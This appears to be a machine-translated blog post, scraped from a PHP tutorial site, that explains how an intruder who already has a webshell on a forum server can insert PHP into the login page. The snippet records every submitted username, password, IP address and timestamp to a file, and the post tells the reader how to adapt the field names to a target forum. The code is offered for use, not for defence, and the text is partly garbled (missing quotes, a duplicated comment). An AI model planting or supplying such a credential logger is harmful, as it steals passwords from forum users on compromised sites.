After getting the webshell, if you want to penetrate further, the password such as discuz is not directly encrypted with md5, so it is very difficult to crack. I wrote it once for Big Tou before, and yesterday Brother Piggy happened to use it, so I wrote it again. The code is relatively simple, just a few sentences, I will explain the principle in detail, and take care of friends who don’t know much about PHP.
if($_POST[loginsubmit]!=){ //Determine whether the login button is clicked
$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s). rn; // Concatenate the values received by POST and assign them to the variable $sb
fwrite(fopen(robot.txt,ab),$sb);} //The result is written to a file
The following is a brief analysis, taking Huaxia’s login page as an example. Open bbs.xxx.com/login.php, right-click to view the source code, CTRL+F search action to find the login form.
I only copied the key code.
. . . . Powerful ellipsis. . . . . .
//Input box for user name, pay attention to the value of name, which must correspond to $_POST[username], so the password of Huaxia must be intercepted , needs to be changed to $_POST[pwuser]
//Input box for user name, pay attention to the value of name, which should correspond to $_POST[username], So to intercept Huaxia’s password, you need to change it to $_POST[pwpwd]
http://www.bkjia.com/PHPjc/478807.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/478807.htmlTechArticleAfter getting the webshell, if you want to penetrate further, passwords such as discuz are not directly encrypted with md5, so it is difficult to crack. Very big. I helped Datou write once before, and Brother Piggy happened to use it yesterday...
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
